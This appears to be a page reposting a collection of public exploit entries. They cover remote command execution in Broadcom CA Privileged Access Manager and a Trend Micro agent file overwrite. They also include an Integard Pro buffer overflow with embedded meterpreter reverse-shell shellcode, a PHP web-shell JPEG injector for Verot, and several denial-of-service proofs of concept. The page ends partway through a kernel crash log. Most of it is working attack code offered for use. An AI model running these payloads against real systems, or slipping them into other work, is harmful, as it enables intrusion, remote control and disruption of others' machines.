HireHackking

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution # Author: Peter Lapp # Date: 2019-12-05 # Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html # CVE: CVE-2018-9021 and CVE-2018-9022 # Tested on: v2.8.2 import urllib2 import urllib import ssl import sys import json import base64 ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE def send_command(ip, cmd): cmd = urllib.quote_plus(cmd) url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test' request = urllib2.Request(url, None) response = urllib2.urlopen(request, context=ctx) result = json.load(response) return result['responseData'] def get_db_value(): cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag" db_value = send_command(ip,cmd) db_value = db_value.split('\n')[1] return db_value def encode_payload(cmd): sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'" cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag " return cmd def restore_sql(value): sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'" cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag " send_command(ip,cmd) def main(): print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)''' if len(sys.argv) != 2: print "Usage: xceedium_rce.py <target ip>" sys.exit() global ip ip = sys.argv[1] print 'Enter commands below. Type exit to quit' while True: cmd = raw_input('# ') if cmd == "exit": sys.exit() orig_value = get_db_value() payload = encode_payload(cmd) send_command(ip, payload) send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210') output = send_command(ip, 'cat /tmp/output') print output restore_sql(orig_value) if __name__ == "__main__": main()

#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path #Exploit Author : ZwX #Exploit Date: 2019-12-04 #Vendor Homepage : http://www.netgate.sk/ #Link Software : https://www.netgate.sk/download/download.php?id=11 #Tested on OS: Windows 7 #Analyze PoC : ============== C:\Users\ZwX>sc qc ScsiAccess [SC] QueryServiceConfig réussite(s) SERVICE_NAME: AmitiAvHealth TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Amiti Antivirus Health Check DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\ZwX>sc qc AmitiAvSrv [SC] QueryServiceConfig réussite(s) SERVICE_NAME: AmitiAvSrv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Amiti Antivirus Engine Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite # Exploit Author : Peter Lapp # Exploit Date: 2019-12-05 # Vendor Homepage : https://www.trendmicro.com/en_us/business.html # Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716 # Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise. # CVE: 2019-15627 # CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec) # This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools ) # The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations) # This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, # even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. # When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately. # The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file. # While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. # So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, # then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, # and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that # are ripe for the writing that can then point to a malicious binary. # Usage: # 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. # 2. Open a browser (preferrably IE) and start the script # 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript). # 4. Keep refreshing the page until you see the script create the target file overwritten. # # It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. import time import os import subprocess import sys import webbrowser from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler class Stage1_Handler(FileSystemEventHandler): def __init__(self): self.filenames = [] def on_created(self, event): filename = os.path.basename(event.src_path) if filename in self.filenames: print ('Starting symlink creation.') watcher1.stop() symlinkery(self.filenames) else: self.filenames.append(filename) print ('File %s created.') % filename class Stage2_Handler(FileSystemEventHandler): def on_any_event(self, event): if os.path.basename(event.src_path) == 'dsa_control.cmd': print "Target file overwritten/deleted. Cleaning up." subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True) subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True) os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"') os.system('rmdir /S /Q "C:\\test"') os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig','C:\\ProgramData\\Trend Micro\\AMSP\\temp') watcher2.stop() sys.exit(0) class Watcher(object): def __init__(self, event_handler, path_to_watch): self.event_handler = event_handler self.path_to_watch = path_to_watch self.observer = Observer() def run(self): self.observer.schedule(self.event_handler(), self.path_to_watch) self.observer.start() try: while True: time.sleep(1) except KeyboardInterrupt: self.observer.stop() self.observer.join() def stop(self): self.observer.stop() def symlinkery(filenames): print "Enter symlinkery" for filename in filenames: print "Creating symlink for %s" % filename cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename subprocess.Popen(cmdname, shell=True) os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp','C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig') os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test') watcher2.run() print "Watcher 2 started" try: os.mkdir('C:\\test') except: pass path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus' path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\' watcher1 = Watcher(Stage1_Handler,path1) watcher2 = Watcher(Stage2_Handler,path2) switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d" subprocess.Popen(switcheroo, shell=True) watcher1.run()

Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Date: 2019-09-22 Exploit Author: purpl3f0xsecur1ty Vendor Homepage: https://www.tucows.com/ Software Link: http://www.tucows.com/preview/519612/Integard-Home Version: Pro 2.2.0.9026 / Home 2.0.0.9021 Tested on: Windows XP / Win7 / Win10 CVE: CVE-2019-16702 #!/usr/bin/python ######################################################## #~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~# #~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~# # The vulnerability: Integard fails to sanitize input # # to the "NoJs" parameter in an HTTP POST request, # # resulting in a stack buffer overflow that overwrites # # the instruction pointer, leading to remote code # # execution. # ######################################################## import socket import os import sys from struct import pack def main(): print "~*Integard RCE Exploit for XP/7/10*~" print "Chose target: (Enter number only)" print "1) - Windows XP" print "2) - Windows 7/10" target = str(input()) host = "10.0.0.130" port = 18881 #################################################### # Integard's functionality interferes with reverse # # and bind shells. Only Meterpreter seems to work. # #################################################### # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001 # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread meterpreter = "\x90" * 50 meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4" meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15" meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80" meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e" meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a" meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84" meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27" meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66" meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44" meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86" meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc" meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43" meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06" meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc" meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f" meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab" meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b" meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02" meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85" meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca" meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04" meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56" meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda" meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa" meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94" meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37" meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88" meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80" meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe" meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84" meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f" meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea" meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b" meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d" meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36" meterpreter += "\xf9\x7e\x89\x13" if target == "1": print "[*] Sending Windows XP payload using meterpreter/reverse_tcp" # JMP ESP at 0x3E087557 in iertutil.dll crash = "A" * 512 crash += pack("<L",0x3E087557) crash += meterpreter crash += "C" * (1500 - len(crash)) buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done" if target == "2": print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp" # ASLR IS ON!!! MUST USE NON-ASLR MODULE! # POP POP RET in integard.exe (ASLR disabled) nSEH = "\xEB\xD0\x90\x90" # Jump 48 bytes backwards SEH = pack("<L",0x004042B0) jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50) crash += meterpreter crash += "\x90" * 50 crash += jumpCall crash += bigBackJump crash += nSEH crash += SEH buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done" main()

# Exploit Title: Verot 2.0.3 - Remote Code Execution # Date: 2019-12-05 # Exploit Author: Jinny Ramsmark # Vendor Homepage: https://www.verot.net/php_class_upload.htm # Software Link: https://github.com/verot/class.upload.php # Version: <=2.0.3 # Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41 # CVE : CVE-2019-19576 <?php #Title: jpeg payload generator for file upload RCE #Author: Jinny Ramsmark #Github: https://github.com/jra89/CVE-2019-19576 #Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576 #Usage: php inject.php #Output: image.jpg.phar is the file to be used for upload and exploitation #This script assumes no special transforming is done on the image for this specific CVE. #It can be modified however for different sizes and so on (x,y vars). ini_set('display_errors', 1); error_reporting(E_PARSE); #requires php, php-gd $orig = 'image.jpg'; $code = '<?=exec($_GET["c"])?>'; $quality = "85"; $base_url = "http://lorempixel.com"; echo "-=Imagejpeg injector 1.7=-\n"; do { $x = 100; $y = 100; $url = $base_url . "/$x/$y/"; echo "[+] Fetching image ($x X $y) from $url\n"; file_put_contents($orig, file_get_contents($url)); } while(!tryInject($orig, $code, $quality)); echo "[+] It seems like it worked!\n"; echo "[+] Result file: image.jpg.phar\n"; function tryInject($orig, $code, $quality) { $result_file = 'image.jpg.phar'; $tmp_filename = $orig . '_mod2.jpg'; //Create base image and load its data $src = imagecreatefromjpeg($orig); imagejpeg($src, $tmp_filename, $quality); $data = file_get_contents($tmp_filename); $tmpData = array(); echo "[+] Jumping to end byte\n"; $start_byte = findStart($data); echo "[+] Searching for valid injection point\n"; for($i = strlen($data)-1; $i > $start_byte; --$i) { $tmpData = $data; for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n) { $tmpData[$n] = $code[$z]; } $src = imagecreatefromstring($tmpData); imagejpeg($src, $result_file, $quality); if(checkCodeInFile($result_file, $code)) { unlink($tmp_filename); unlink($result_file); sleep(1); file_put_contents($result_file, $tmpData); echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n"; sleep(1); $src = imagecreatefromjpeg($result_file); return true; } else { unlink($result_file); } } unlink($orig); unlink($tmp_filename); return false; } function findStart($str) { for($i = 0; $i < strlen($str); ++$i) { if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA) { return $i+2; } } return -1; } function checkCodeInFile($file, $code) { if(file_exists($file)) { $contents = loadFile($file); } else { $contents = "0"; } return strstr($contents, $code); } function loadFile($file) { $handle = fopen($file, "r"); $buffer = fread($handle, filesize($file)); fclose($handle); return $buffer; }

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34 eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 CoolType!CTInit+0x3913e: 10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194 0:000> u @eip-14 CoolType!CTInit+0x3912a: 10e6c28a 8b7d0c mov edi,dword ptr [ebp+0Ch] 10e6c28d 8b571c mov edx,dword ptr [edi+1Ch] 10e6c290 8b7720 mov esi,dword ptr [edi+20h] 10e6c293 035508 add edx,dword ptr [ebp+8] 10e6c296 8b4724 mov eax,dword ptr [edi+24h] 10e6c299 037508 add esi,dword ptr [ebp+8] 10e6c29c 03c6 add eax,esi 10e6c29e 8902 mov dword ptr [edx],eax 0:000> ? poi(edi+1c) Evaluate expression: -690332 = fff57764 0:000> ? poi(ebp+8) Evaluate expression: 1887538240 = 70818c40 0:000> !heap -p -a 70818c40 address 70818c40 found in _DPH_HEAP_ROOT @ bfc1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 723d3b94: 70818c40 173c0 - 70818000 19000 unknown!fillpattern 0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c 77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6 77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 77e7ccee ntdll!RtlAllocateHeap+0x0000003e 0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 77c2f1f6 ucrtbase!_malloc_base+0x00000026 5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9 10e37991 CoolType!CTInit+0x00004831 10e38e1b CoolType!CTInit+0x00005cbb 10e68870 CoolType!CTInit+0x00035710 10e683dc CoolType!CTInit+0x0003527c 10e67d25 CoolType!CTInit+0x00034bc5 10e65902 CoolType!CTInit+0x000327a2 10e633f2 CoolType!CTInit+0x00030292 10e62719 CoolType!CTInit+0x0002f5b9 10e620e8 CoolType!CTInit+0x0002ef88 10e62000 CoolType!CTInit+0x0002eea0 108f36f1 AGM!AGMInitialize+0x0002a881 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e 01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82 02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6 03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87 04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef 05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750 06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99 07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac 08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292 09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9 0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88 0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0 0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881 0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce 0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197 0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c --- cut --- Notes: - The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability. - Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though). - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case). - Attached samples: poc[1-4].pdf (crashing files). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip

# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS) # Date: 2019-10-28 # Exploit Author: Gabor Seljan # Vendor Homepage: https://www.microsoft.com/ # Version: 17763.1.amd64fre.rs5_release.180914-1434 # Tested on: Windows 10 Version 1809 for x64-based Systems # CVE: CVE-2019-1476 # Summary: # AppXSvc improperly handles file hard links resulting in a low privileged user # being able to overwrite an arbitrary file leading to elevation of privilege. # Description: # An elevation of privilege vulnerability exists when the AppX Deployment Server # (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 # originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced # to overwrite an arbitrary file by deleting all registry data files before # creating the file hard link. As Nabeel Ahmed described in his write-up of # CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with # the original settings.dat template. However, additional settings.dat.LOG1 and # settings.dat.LOG2 files are also created during the initialization process. # Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard # link allows a low privileged user to overwrite an arbitrary file with registry # data or just simply empty it, respectively. A low privileged user could exploit # this vulnerability to cause denial of service by overwriting critical system # files. Steps to reproduce: 1. Terminate Paint 3D processes. 2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder. 3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini. 4. Execute the start ms-paint: command to run Paint 3D. 5. Terminate Paint 3D processes. Expected result: It isn't possible to overwrite a file not writable by a low privileged user. Observed result: C:\Windows\win.ini file is overwritten with registry data. References: https://github.com/sgabe/CVE-2019-1476 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841

# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC) # Discovery by: SajjadBnd # Date: 2019-12-10 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Tested Version: 4.2.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # [ About App ] # Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista, # Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more... # Visit "Features" page to see all supported software list of programs with which product key finder works. # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # Product key Explorer recovers product keys for software installed on your # local and network computers, allows track the number of software licenses installed in your business. # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money! # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv), # Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard. # [ POC ] # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Key' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 100 buffer += "\x42" * 100 buffer += "\x43" * 58 try: f = open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC) # Date: 2019-12-11 # Exploit Author: Nassim Asrir # CVE: CVE-2019-6192 # Tested On: Windows 10(64bit) | ThinkPad T470p # Vendor : https://www.lenovo.com/us/en/ # Ref : https://support.lenovo.com/us/fr/solutions/len-29334 # Description # A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver # The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes # Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space. # Exploit #include <windows.h> #include <stdio.h> #include <conio.h> int main(int argc, char **argv) { HANDLE hDevice; DWORD bret; char szDevice[] = "\\\\.\\pmdrvs"; printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n"); printf("Opening handle to driver..\n"); if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) { printf("Device %s succesfully opened!\n", szDevice); printf("\tHandle: %p\n", hDevice); } else { printf("Error: Error opening device %s\n", szDevice); } printf("\nPress any key to DoS.."); _getch(); bret = 0; if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) { printf("DeviceIoControl Error - bytes returned %#x\n", bret); } CloseHandle(hDevice); return 0; } # RCA 2: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. FAULTING_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? Resetting default scope CPU_COUNT: 8 CPU_MHZ: af8 CPU_VENDOR: GenuineIntel CPU_FAMILY: 6 CPU_MODEL: 9e CPU_STEPPING: 9 CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) BLACKBOXBSD: 1 (!blackboxbsd) BLACKBOXPNP: 1 (!blackboxpnp) CURRENT_IRQL: 0 ANALYSIS_SESSION_HOST: LAPTOP-SP ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 ANALYSIS_VERSION: 10.0.17763.132 amd64fre LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d STACK_TEXT: ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071 ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 THREAD_SHA1_HASH_MOD_FUNC: 